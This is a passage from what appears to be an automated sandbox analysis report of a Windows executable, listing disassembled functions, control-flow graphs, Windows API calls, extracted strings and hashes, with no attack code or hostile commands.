                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 003DAF65
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,0040412A), ref: 003DAF79
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 003DAFA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                          • String ID: %s.%d.tmp$*A@$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                          • API String ID: 3676479488-2078895908
                                                                                          • Opcode ID: 0014bfe417ba8c0b64ded6401f3bb2dbd864a6dd3d14c186aa95a76bad5bd470
                                                                                          • Instruction ID: 0aecebb17d97c2d1f0637e1add143ccc2c2c3b33310d68026b06a352f93a0427
                                                                                          • Opcode Fuzzy Hash: 0014bfe417ba8c0b64ded6401f3bb2dbd864a6dd3d14c186aa95a76bad5bd470
                                                                                          • Instruction Fuzzy Hash: F1E18173900569AAEF26EBA0EE45EEE737CAB04350F1140A7F545E7181EB709F84CB61

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 563 3cced7-3ccf51 call 3cc88e GetWindowRect GetClientRect 566 3ccf57-3ccf5f 563->566 567 3ccff2-3ccffa 563->567 568 3cd034-3cd04f GetSystemMetrics GetWindow 566->568 569 3ccf65-3ccfae 566->569 567->568 570 3ccffc-3cd02e GetWindowTextW call 3cc91f SetWindowTextW 567->570 572 3cd12d-3cd12f 568->572 573 3ccfb0 569->573 574 3ccfb2-3ccfb4 569->574 570->568 578 3cd054-3cd05a 572->578 579 3cd135-3cd13f 572->579 573->574 576 3ccfb8-3ccfee GetWindowLongW GetWindowRect 574->576 577 3ccfb6 574->577 576->567 577->576 578->579 580 3cd060-3cd078 GetWindowTextW 578->580 581 3cd09f-3cd0a4 580->581 582 3cd07a-3cd099 call 3cc91f SetWindowTextW 580->582 585 3cd11b-3cd12a GetWindow 581->585 586 3cd0a6-3cd114 GetWindowRect 581->586 582->581 585->579 588 3cd12c 585->588 586->585 588->572
                                                                                          APIs
                                                                                            • Part of subcall function 003CC88E: _wcschr.LIBVCRUNTIME ref: 003CC8BD
                                                                                          • GetWindowRect.USER32(?,?), ref: 003CCF0E
                                                                                          • GetClientRect.USER32(?,?), ref: 003CCF1A
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CCFBB
                                                                                          • GetWindowRect.USER32(?,?), ref: 003CCFE8
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 003CD007
                                                                                          • SetWindowTextW.USER32(?,?), ref: 003CD02E
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 003CD036
                                                                                          • GetWindow.USER32(?,00000005), ref: 003CD041
                                                                                          • GetWindowTextW.USER32(00000000,?,00000400), ref: 003CD06C
                                                                                          • SetWindowTextW.USER32(00000000,00000000), ref: 003CD099
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 003CD0AC
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 003CD11E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                          • String ID: d
                                                                                          • API String ID: 4134264131-2564639436
                                                                                          • Opcode ID: 7b132f907259b07ce8fadcf12e39b71328864a89ad479d7613a48b4283b33e17
                                                                                          • Instruction ID: 8ab5fb7b8626f28a7d42f8faab666b9c146976bf311416300e27cf05bf6d9f35
                                                                                          • Opcode Fuzzy Hash: 7b132f907259b07ce8fadcf12e39b71328864a89ad479d7613a48b4283b33e17
                                                                                          • Instruction Fuzzy Hash: 38616EB2108304AFD312DF68CD89E6BBBEAFB89714F05452DF689D2290C674ED05CB52

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetDlgItem.USER32(00000068,00418958), ref: 003DB71D
                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,003D9325), ref: 003DB748
                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003DB757
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,003F02E4), ref: 003DB761
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003DB777
                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003DB78D
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003DB7CD
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003DB7D7
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003DB7E6
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003DB809
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,003F1368), ref: 003DB814
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ItemShowWindow
                                                                                          • String ID: \
                                                                                          • API String ID: 1207805008-2967466578
                                                                                          • Opcode ID: 56cf62e97ee65f932afbb940a47b95e0c13f54410a17b863df76ea73906a3b7e
                                                                                          • Instruction ID: 57c7d465c86de5cb6b74547c4d13ea62b95cbf20e8c202695f207fcd4de2e89f
                                                                                          • Opcode Fuzzy Hash: 56cf62e97ee65f932afbb940a47b95e0c13f54410a17b863df76ea73906a3b7e
                                                                                          • Instruction Fuzzy Hash: 3C2126712857447BE312EB249C45FABBE9CEF82714F010519FA90A61D1D7A54A08CAAB

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 621 3db9aa-3db9c2 call 3dcec0 624 3dbc0e-3dbc16 621->624 625 3db9c8-3db9d4 call 3e20b3 621->625 625->624 628 3db9da-3dba02 call 3ddea0 625->628 631 3dba0c-3dba19 628->631 632 3dba04 628->632 633 3dba1d-3dba26 631->633 634 3dba1b 631->634 632->631 635 3dba5e 633->635 636 3dba28-3dba2a 633->636 634->633 638 3dba62-3dba64 635->638 637 3dba32-3dba35 636->637 639 3dba3b-3dba43 637->639 640 3dbbc2-3dbbc7 637->640 641 3dba6b-3dba6d 638->641 642 3dba66-3dba69 638->642 643 3dba49-3dba4f 639->643 644 3dbbdb-3dbbe3 639->644 645 3dbbbc-3dbbc0 640->645 646 3dbbc9 640->646 647 3dba80-3dba92 call 3cb09c 641->647 648 3dba6f-3dba76 641->648 642->641 642->647 643->644 650 3dba55-3dba5c 643->650 652 3dbbeb-3dbbf3 644->652 653 3dbbe5-3dbbe7 644->653 645->640 651 3dbbce-3dbbd2 645->651 646->651 656 3dbaab-3dbab6 call 3c9dff 647->656 657 3dba94-3dbaa1 call 3d0b12 647->657 648->647 654 3dba78 648->654 650->635 650->637 651->644 652->638 653->652 654->647 663 3dbab8-3dbacf call 3cae20 656->663 664 3dbad3-3dbae0 ShellExecuteExW 656->664 657->656 662 3dbaa3 657->662 662->656 663->664 666 3dbc0c-3dbc0d 664->666 667 3dbae6-3dbaf9 664->667 666->624 669 3dbb0c-3dbb0e 667->669 670 3dbafb-3dbb02 667->670 671 3dbb21-3dbb40 call 3dbe69 669->671 672 3dbb10-3dbb19 669->672 670->669 673 3dbb04-3dbb0a 670->673 674 3dbb77-3dbb83 CloseHandle 671->674 691 3dbb42-3dbb4a 671->691 672->671 682 3dbb1b-3dbb1f ShowWindow 672->682 673->669 673->674 675 3dbb85-3dbb92 call 3d0b12 674->675 676 3dbb94-3dbba2 674->676 675->676 688 3dbbf8 675->688 680 3dbbff-3dbc01 676->680 681 3dbba4-3dbba6 676->681 680->666 685 3dbc03-3dbc05 680->685 681->680 686 3dbba8-3dbbae 681->686 682->671 685->666 689 3dbc07-3dbc0a ShowWindow 685->689 686->680 690 3dbbb0-3dbbba 686->690 688->680 689->666 690->680 691->674 692 3dbb4c-3dbb5d GetExitCodeProcess 691->692 692->674 693 3dbb5f-3dbb69 692->693 694 3dbb6b 693->694 695 3dbb70 693->695 694->695 695->674
                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(000001C0), ref: 003DBAD8
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 003DBB1D
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 003DBB55
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DBB7B
                                                                                          • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 003DBC0A
                                                                                            • Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                          • String ID: $*Q@$.exe$.inf
                                                                                          • API String ID: 3686203788-207396646
                                                                                          • Opcode ID: 3d35fd54f9fa7df4a90f882997741e195842b3eab03902bd60b52768a78deb09
                                                                                          • Instruction ID: 97483cafa15fb80990eaf6751675dc539174213e191136c7c04bba9ae6c133dd
                                                                                          • Opcode Fuzzy Hash: 3d35fd54f9fa7df4a90f882997741e195842b3eab03902bd60b52768a78deb09
                                                                                          • Instruction Fuzzy Hash: 6B51C172519380DAD7339F60E940ABBFBE9AF84704F06081FE4C197395DBB19948CB52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 696 3ccacc-3ccb00 call 3dcdf0 call 3dcec0 call 3e0138 703 3ccb02-3ccb31 GetModuleFileNameW call 3cb88c call 3cf0e6 696->703 704 3ccb33-3ccb3c call 3cf10e 696->704 707 3ccb41-3ccb65 call 3c9401 call 3c973d 703->707 704->707 715 3ccdb8-3ccdd3 call 3c9437 707->715 716 3ccb6b-3ccb74 707->716 718 3ccb77-3ccb7a 716->718 720 3ccca8-3cccc8 call 3c99e0 call 3e20d3 718->720 721 3ccb80-3ccb86 call 3c9aeb 718->721 720->715 732 3cccce-3ccce7 call 3c990d 720->732 725 3ccb8b-3ccbb2 call 3c990d 721->725 730 3ccbb8-3ccbc0 725->730 731 3ccc71-3ccc74 725->731 734 3ccbeb-3ccbf6 730->734 735 3ccbc2-3ccbca 730->735 736 3ccc77-3ccc99 call 3c99e0 731->736 742 3ccce9-3cccee 732->742 743 3cccf0-3ccd02 call 3e20d3 732->743 739 3ccbf8-3ccc04 734->739 740 3ccc21-3ccc29 734->740 735->734 738 3ccbcc-3ccbe6 call 3e3660 735->738 736->718 754 3ccc9f-3ccca2 736->754 757 3ccbe8 738->757 758 3ccc67-3ccc6f 738->758 739->740 745 3ccc06-3ccc0b 739->745 747 3ccc2b-3ccc33 740->747 748 3ccc55-3ccc59 740->748 750 3ccd27-3ccd2f 742->750 743->715 764 3ccd08-3ccd25 call 3d06e9 call 3e20ce 743->764 745->740 753 3ccc0d-3ccc1f call 3e3589 745->753 747->748 755 3ccc35-3ccc4f call 3e3660 747->755 748->731 749 3ccc5b-3ccc5e 748->749 749->730 760 3ccd34-3ccd41 750->760 761 3ccd31 750->761 753->740 769 3ccc63 753->769 754->715 754->720 755->715 755->748 757->734 758->736 766 3ccdad-3ccdb5 760->766 767 3ccd43-3ccd45 760->767 761->760 764->750 766->715 770 3ccd46-3ccd50 767->770 769->758 770->766 771 3ccd52-3ccd56 770->771 773 3ccd58-3ccd5f 771->773 774 3ccd90-3ccd93 771->774 776 3ccd86 773->776 777 3ccd61-3ccd64 773->777 779 3ccd9d-3ccd9f 774->779 780 3ccd95-3ccd9b 774->780 783 3ccd88-3ccd8e 776->783 781 3ccd66-3ccd69 777->781 782 3ccd82-3ccd84 777->782 784 3ccda0 779->784 780->779 780->784 786 3ccd7e-3ccd80 781->786 787 3ccd6b-3ccd6e 781->787 782->783 785 3ccda4-3ccdab 783->785 784->785 785->766 785->770 786->783 788 3ccd7a-3ccd7c 787->788 789 3ccd70-3ccd74 787->789 788->783 789->784 790 3ccd76-3ccd78 789->790 790->783
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003CCAD1
                                                                                          • _wcschr.LIBVCRUNTIME ref: 003CCAEF
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,003CCAB3,?), ref: 003CCB0A
                                                                                            • Part of subcall function 003D06E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,003CB25B,00000000,?,?,?,?), ref: 003D0705
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                          • String ID: *messages***$*messages***$R$a
                                                                                          • API String ID: 803915177-2900423073
                                                                                          • Opcode ID: a6f2731ad17edc92e4ca2275a7404370a66d6e4bb318cd0e7ba1a5c83e367a5f
                                                                                          • Instruction ID: 661b7302e22d1173c82b4db6eb26dfba8ab60ed6ad50d9523afca661b656d501
                                                                                          • Opcode Fuzzy Hash: a6f2731ad17edc92e4ca2275a7404370a66d6e4bb318cd0e7ba1a5c83e367a5f
                                                                                          • Instruction Fuzzy Hash: 409137B29002049ADB36DF68CC49FEEBBA4EF54700F11456EE64EEB2D1DA709D81CB50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 791 3e73ae-3e73c7 792 3e73dd-3e73e2 791->792 793 3e73c9-3e73d9 call 3eb9bc 791->793 795 3e73ef-3e7413 MultiByteToWideChar 792->795 796 3e73e4-3e73ec 792->796 793->792 800 3e73db 793->800 798 3e7419-3e7425 795->798 799 3e75a6-3e75b9 call 3dd783 795->799 796->795 801 3e7479 798->801 802 3e7427-3e7438 798->802 800->792 804 3e747b-3e747d 801->804 805 3e743a-3e7449 call 3ef160 802->805 806 3e7457-3e7468 call 3e59fc 802->806 809 3e759b 804->809 810 3e7483-3e7496 MultiByteToWideChar 804->810 805->809 816 3e744f-3e7455 805->816 806->809 817 3e746e 806->817 814 3e759d-3e75a4 call 3e7616 809->814 810->809 813 3e749c-3e74ae call 3e7a09 810->813 821 3e74b3-3e74b7 813->821 814->799 820 3e7474-3e7477 816->820 817->820 820->804 821->809 823 3e74bd-3e74c4 821->823 824 3e74fe-3e750a 823->824 825 3e74c6-3e74cb 823->825 826 3e750c-3e751d 824->826 827 3e7556 824->827 825->814 828 3e74d1-3e74d3 825->828 829 3e751f-3e752e call 3ef160 826->829 830 3e7538-3e7549 call 3e59fc 826->830 831 3e7558-3e755a 827->831 828->809 832 3e74d9-3e74f3 call 3e7a09 828->832 834 3e7594-3e759a call 3e7616 829->834 846 3e7530-3e7536 829->846 830->834 847 3e754b 830->847 833 3e755c-3e7575 call 3e7a09 831->833 831->834 832->814 844 3e74f9 832->844 833->834 848 3e7577-3e757e 833->848 834->809 844->809 849 3e7551-3e7554 846->849 847->849 850 3e75ba-3e75c0 848->850 851 3e7580-3e7581 848->851 849->831 852 3e7582-3e7592 WideCharToMultiByte 850->852 851->852 852->834 853 3e75c2-3e75c9 call 3e7616 852->853 853->814
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003E2FC2,003E2FC2,?,?,?,003E75FF,00000001,00000001,F5E85006), ref: 003E7408
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,003E75FF,00000001,00000001,F5E85006,?,?,?), ref: 003E748E
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 003E7588
                                                                                          • __freea.LIBCMT ref: 003E7595
                                                                                            • Part of subcall function 003E59FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E
                                                                                          • __freea.LIBCMT ref: 003E759E
                                                                                          • __freea.LIBCMT ref: 003E75C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: c0dee0a7a1137cfcc47a91b3924b37a8b66fafb19d488d2087dcdc1da0d227d2
                                                                                          • Instruction ID: e4134a2e6dc1c5dd764909110da2c06e8e0770753e34af95aa1a70974e6e4e58
                                                                                          • Opcode Fuzzy Hash: c0dee0a7a1137cfcc47a91b3924b37a8b66fafb19d488d2087dcdc1da0d227d2
                                                                                          • Instruction Fuzzy Hash: D351D6726142A6ABEB278F66CC41EBF77A9EB45750F164729FC14DA2C0EB34DC40C650

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 856 3d8fc8-3d8fe7 GetClassNameW 857 3d900f-3d9011 856->857 858 3d8fe9-3d8ffe call 3d0b12 856->858 860 3d901c-3d9020 857->860 861 3d9013-3d9015 857->861 863 3d900e 858->863 864 3d9000-3d900c FindWindowExW 858->864 861->860 863->857 864->863
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000050), ref: 003D8FDF
                                                                                          • SHAutoComplete.SHLWAPI(?,00000010), ref: 003D9016
                                                                                            • Part of subcall function 003D0B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,003CAC49,?,?,?,003CABF8,?,-00000002,?,00000000,?), ref: 003D0B28
                                                                                          • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 003D9006
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                          • String ID: @Ut$EDIT
                                                                                          • API String ID: 4243998846-2065656831
                                                                                          • Opcode ID: 8ae426d798dd2bf86f699e88bef3cb8f1716dbeec769810d81add7365fdcee22
                                                                                          • Instruction ID: 75a147c59dd9368855ae0bd2da811b33a85964d20dde5ca36fff068c367be46c
                                                                                          • Opcode Fuzzy Hash: 8ae426d798dd2bf86f699e88bef3cb8f1716dbeec769810d81add7365fdcee22
                                                                                          • Instruction Fuzzy Hash: 6BF0E93360062C67EB325625BC05FAB766C9B49B11F050057BA04F2280D760D915C6E6

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 003CF309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 003CF324
                                                                                            • Part of subcall function 003CF309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,003CDEC8,Crypt32.dll,?,003CDF4A,?,003CDF2E,?,?,?,?), ref: 003CF346
                                                                                          • OleInitialize.OLE32(00000000), ref: 003D904F
                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 003D9086
                                                                                          • SHGetMalloc.SHELL32(004020E8), ref: 003D9090
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                          • String ID: riched20.dll$3uo
                                                                                          • API String ID: 3498096277-228713755
                                                                                          • Opcode ID: bc291b9dcd2c1debdb83215b9d523e2ab77d135c0d23c894b13281b5dc6aaa81
                                                                                          • Instruction ID: be02dcd33d8844100dd9576e89a19930fd0bbf0420dba63b1138832680f69d66
                                                                                          • Opcode Fuzzy Hash: bc291b9dcd2c1debdb83215b9d523e2ab77d135c0d23c894b13281b5dc6aaa81
                                                                                          • Instruction Fuzzy Hash: 1DF03CB5800209ABCB11AF9AD8499EEFBBCEB84300F00406BE804E2240D7B41605CBA1

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 003CFDC9: ResetEvent.KERNEL32(?,?,003CF9F3,00D53B38,?,00401E74,00000000,003EF79B,000000FF,000001B8,003CFC8F,?,?,?,?,003CA5A0), ref: 003CFDE9
                                                                                            • Part of subcall function 003CFDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,003CA5A0,?,?,?,?,003EF79B,000000FF), ref: 003CFDFD
                                                                                          • ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 003CFA05
                                                                                          • CloseHandle.KERNEL32(?,?), ref: 003CFA1F
                                                                                          • DeleteCriticalSection.KERNEL32(?), ref: 003CFA38
                                                                                          • CloseHandle.KERNELBASE(?), ref: 003CFA44
                                                                                          • CloseHandle.KERNEL32(?), ref: 003CFA50
                                                                                            • Part of subcall function 003CFAC7: WaitForSingleObject.KERNEL32(?,000000FF,003CFD0B,?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFACD
                                                                                            • Part of subcall function 003CFAC7: GetLastError.KERNEL32(?,?,003CFD80,?,?,?,?,?,003CFD6A), ref: 003CFAD9
                                                                                          Memory Dump Source
